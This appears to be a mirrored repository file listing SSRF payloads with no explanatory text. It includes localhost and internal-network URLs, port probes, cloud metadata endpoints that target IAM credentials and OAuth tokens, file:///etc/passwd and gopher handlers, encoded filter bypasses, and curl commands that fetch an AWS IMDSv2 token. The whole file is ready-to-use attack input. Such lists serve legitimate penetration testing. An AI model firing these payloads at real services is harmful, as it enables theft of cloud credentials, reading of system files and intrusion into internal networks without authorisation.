mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 19:36:33 +00:00
copilot-swe-agent[bot]
ab9c127df3
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
86 lines
2.0 KiB
Plaintext
86 lines
2.0 KiB
Plaintext
# SSRF (Server-Side Request Forgery) Payloads
|
|
|
|
# Basic SSRF
|
|
http://127.0.0.1
|
|
http://localhost
|
|
http://0.0.0.0
|
|
http://[::1]
|
|
http://[::]
|
|
|
|
# Port scanning
|
|
http://127.0.0.1:22
|
|
http://127.0.0.1:80
|
|
http://127.0.0.1:443
|
|
http://127.0.0.1:3306
|
|
http://127.0.0.1:5432
|
|
http://127.0.0.1:6379
|
|
http://127.0.0.1:8080
|
|
http://127.0.0.1:27017
|
|
|
|
# Cloud metadata endpoints
|
|
# AWS
|
|
http://169.254.169.254/latest/meta-data/
|
|
http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
http://169.254.169.254/latest/user-data/
|
|
|
|
# Google Cloud
|
|
http://metadata.google.internal/computeMetadata/v1/
|
|
http://metadata.google.internal/computeMetadata/v1/instance/
|
|
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
|
|
|
|
# Azure
|
|
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
|
|
|
|
# Digital Ocean
|
|
http://169.254.169.254/metadata/v1/
|
|
http://169.254.169.254/metadata/v1/id
|
|
|
|
# Internal network scanning
|
|
http://192.168.0.1
|
|
http://192.168.1.1
|
|
http://10.0.0.1
|
|
http://172.16.0.1
|
|
|
|
# Protocol handlers
|
|
file:///etc/passwd
|
|
file:///c:/windows/win.ini
|
|
dict://127.0.0.1:11211/
|
|
gopher://127.0.0.1:6379/_INFO
|
|
ldap://127.0.0.1:389
|
|
tftp://127.0.0.1:69
|
|
|
|
# Bypassing filters
|
|
# Using decimal IP
|
|
http://2130706433 (127.0.0.1)
|
|
http://3232235521 (192.168.0.1)
|
|
|
|
# Using octal IP
|
|
http://0177.0.0.1
|
|
http://0x7f.0x0.0x0.0x1
|
|
|
|
# Using hex IP
|
|
http://0x7f000001
|
|
http://0x7f.0x0.0x0.0x1
|
|
|
|
# DNS rebinding
|
|
http://spoofed.burpcollaborator.net
|
|
|
|
# URL encoding
|
|
http://127.0.0.1%23@example.com
|
|
http://example.com@127.0.0.1
|
|
http://127.0.0.1%00.example.com
|
|
http://127.0.0.1%2f%2f@example.com
|
|
|
|
# IPv6 localhost
|
|
http://[::1]
|
|
http://[0:0:0:0:0:0:0:1]
|
|
http://[0000:0000:0000:0000:0000:0000:0000:0001]
|
|
|
|
# Redirect-based SSRF
|
|
http://redirect.example.com?url=http://127.0.0.1
|
|
|
|
# AWS IMDSv2 (requires token)
|
|
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
|
|
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
|